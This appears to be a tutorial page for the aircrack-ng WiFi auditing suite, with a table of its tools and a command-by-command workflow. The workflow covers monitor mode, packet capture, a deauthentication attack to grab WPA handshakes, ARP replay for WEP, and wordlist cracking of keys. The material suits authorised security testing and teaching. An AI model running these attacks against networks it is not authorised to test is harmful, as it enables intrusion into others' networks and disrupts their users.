aircrack-ng
Aircrack-ng is a complete suite of tools to assess WiFi network security.
It focuses on different areas of WiFi security:
- Monitoring: Packet capture and export of data to text files for further processing by third party tools.
- Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.
- Testing: Checking WiFi cards and driver capabilities (capture and injection).
- Cracking: WEP and WPA PSK (WPA 1 and 2).
Tools
| Tool | Purpose |
|---|---|
| airmon‑ng | Enable/disable monitor mode on Wi‑Fi interface |
| airodump‑ng | Packet capture & network scanning |
| aireplay‑ng | Packet injection/deauthentication replay |
| aircrack‑ng | Cracks captured WEP/WPA/WPA2‑PSK keys |
| airdecap‑ng | Decrypts captures when key is already known |
| airolib‑ng | Manages hash tables for WPA/WPA2 cracking |
| airbase‑ng | Rogue AP creation for client data capture |
Example Workflow
-
Enable Monitor Mode
sudo airmon-ng check kill sudo airmon-ng start wlan0 # → launches wlan0mon -
Scan & Capture Network Traffic
sudo airodump-ng wlan0mon sudo airodump-ng -c <channel> --bssid <AP_MAC> -w capture wlan0mon -
Force Handshake Capture (for WPA/WPA2) (DeAuth Attack)
sudo aireplay-ng -0 5 -a <AP_MAC> -c <Client_MAC> wlan0mon -
Crack the Key
-
WEP: Inject ARP requests to increase IV collection, then crack:
sudo aireplay-ng -3 -b <AP_MAC> wlan0mon aircrack-ng -b <AP_MAC> capture.cap -
WPA/WPA2: Capture a handshake, then use wordlist:
aircrack-ng -w /path/to/wordlist.txt -b <AP_MAC> capture.cap
-
-
Clean Up
sudo airmon-ng stop wlan0mon sudo service NetworkManager restart